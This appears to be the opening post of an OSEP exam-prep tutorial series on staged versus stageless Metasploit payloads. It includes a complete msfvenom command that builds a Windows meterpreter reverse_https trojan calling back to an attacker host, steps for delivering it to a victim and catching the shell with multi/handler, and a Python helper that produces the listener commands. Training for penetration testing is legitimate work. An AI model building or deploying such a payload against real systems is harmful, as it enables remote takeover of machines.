Hello, this is the first part in the OSEP series.

Let’s see: we have two types of trojans (payloads):

  1. Staged payloads

  2. Non-staged payloads

Staged Payloads

A staged payload is a type of malware that, when run on the victim's operating system, connects back to the attacker to download the next stage. You can think of it as the bridge between the victim machine and the malicious code we want to run on that machine. This type of malware is small in size, and once the stage is delivered it may be written to the hard disk or run directly from memory.

As we see, the /shell/ in the payload name (a slash between the stage type and the transport) means this is a staged payload: it contains a minimal amount of code that performs a callback, then downloads the rest of the code and executes it in the target's memory (which may evade antivirus programs).

For example,

let’s create a staged payload and pay attention to every detail.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.2.5 LPORT=443 -f exe -o staged.exe

As we see, we created our staged payload with msfvenom, so let’s transfer it to the victim machine.

As we notice, the size of the malware is 7 KB, which is really small because it only contains the code needed to execute the callback and download the rest of the payload. So let’s set up the multi handler before running it.
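As an added example (not from the original post), here is a small Python helper that applies the /shell/ versus shell_ naming rule from above to any Metasploit payload name and builds the multi/handler lines that must match the msfvenom command exactly; the function and class names are my own.

```python
# Added example (not from the original post): classify Metasploit payload
# names by the staged/stageless naming convention and build the matching
# multi/handler settings. Helper names are mine; the payload name, LHOST
# and LPORT used in the checks are the ones from this page.
from dataclasses import dataclass
from typing import List, Optional

# Stage types that exist both as type/transport (staged) and
# type_transport (stageless) payload names.
STAGE_TYPES = ("meterpreter", "shell", "vncinject", "dllinject", "powershell")
ARCHES = ("x64", "x86", "aarch64", "armle", "mipsbe", "mipsle")


@dataclass
class Payload:
    name: str
    platform: str
    arch: Optional[str]
    stage: str        # e.g. "meterpreter"
    transport: str    # e.g. "reverse_https"
    staged: bool      # True: tiny stager downloads the stage at run time


def classify_payload(name: str) -> Payload:
    """windows/x64/meterpreter/reverse_https -> staged (slash between stage
    and transport); windows/x64/meterpreter_reverse_https -> stageless
    (underscore: the whole payload is inside the binary)."""
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a platform/payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in ARCHES else None
    if len(rest) == 2 and rest[0] in STAGE_TYPES:
        return Payload(name, platform, arch, rest[0], rest[1], staged=True)
    if len(rest) == 1:
        for stage in STAGE_TYPES:
            if rest[0].startswith(stage + "_"):
                transport = rest[0][len(stage) + 1:]
                return Payload(name, platform, arch, stage, transport, False)
        # single-component payloads such as windows/exec carry no stager
        return Payload(name, platform, arch, rest[0], "", staged=False)
    raise ValueError(f"unrecognised payload name: {name!r}")


def handler_commands(name: str, lhost: str, lport: int) -> List[str]:
    """msfconsole lines for the listener. PAYLOAD must be the exact name
    given to msfvenom: a stager that reaches a handler configured for a
    different payload receives no stage, so no session ever appears."""
    return ["use exploit/multi/handler", f"set PAYLOAD {name}",
            f"set LHOST {lhost}", f"set LPORT {lport}", "exploit -j"]
```

The same rule tells you which listener to expect on the defensive side: a 7 KB staged binary is useless without its handler, so the callback to LHOST:LPORT is the event worth alerting on.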

Now let’s run the malware.

Okay, now we should go and check the multi handler to see the shell.